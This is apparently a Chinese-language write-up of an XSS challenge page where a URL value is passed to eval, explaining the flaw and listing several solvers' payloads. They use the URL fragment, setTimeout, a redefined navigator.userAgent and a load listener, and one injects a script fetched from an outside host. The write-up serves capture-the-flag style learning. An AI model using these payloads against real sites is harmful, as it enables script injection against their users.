起始
一次看到一位大牛放出的一个xss挑战页面,在iframe页面中执行xss即算完成.地址: http://server.n0tr00t.com/n0js/case2.html标准: Please execute the jscode in the iframe(name=hi): prompt location.href Work: Chrome, Firefox
case2.html
n0js case2 [n0js] case2
Please execute the jscode in the iframe(name=hi): prompt location.href Work: Chrome, Firefox Datetime: 2016-12-14
- Submit: evi1m0.bat[at]gmail.com
- Casetip: dota2 pudge
- Subject by: evi1m0 / server.n0tr00t.com
case2_test.html
分析
1. case2.html中js取url地址“="后面的值传入eval执行2. 页面先加载js,后加载的iframe3. url传入的参数带单引号,双引号都会被urlencode4. case2_test.html提示userAgent或许可用5. 开搞
解决
1. url应该是case2.html?test=payload2. 使用延时执行js;修改浏览器的navigator.platform属性;绑定监听页面load事件3. url地址“#”后面的单双引号等字符不会被编码
case1: 延时加载js
解法一:case2.html?a=location.hash.substr(1)#setTimeout("w=window['hi'];s=w.document.createElement('script');s.src='http://1.1.1.1/1.js';w.document.body.appendChild(s);", 2000) //@piaca解法二:case2.html?a=location.hash.substr(1)#setTimeout("hi.eval('prompt(location.href)')",500) // @fyth
case2: 修改浏览器属性
解法一:case2.html?a=window.location.hash.substring(1)#Object.defineProperty(navigator,'userAgent',{get:function(){return '';}}) //@gaoheby解法二:case2.html?a=location.hash.substr(1)#navigator.__defineGetter__('userAgent', function(){ return '
case3: 绑定监听页面load属性
case2.html?test=location.hash.substr(1)#window.addEventListener('load', function(){window.hi.prompt(hi.location.href)})
最后
作者测试页面: http://server.n0tr00t.com/n0js/ 上面几个解法都来自此页面,作者又放出了一个case,欢迎感兴趣的去玩耍,多学习。MDN的 JavaScript文档: https://developer.mozilla.org/zh-CN/docs/Web/JavaScript 好好学习天天向上,thx piaca & NorthOrchid。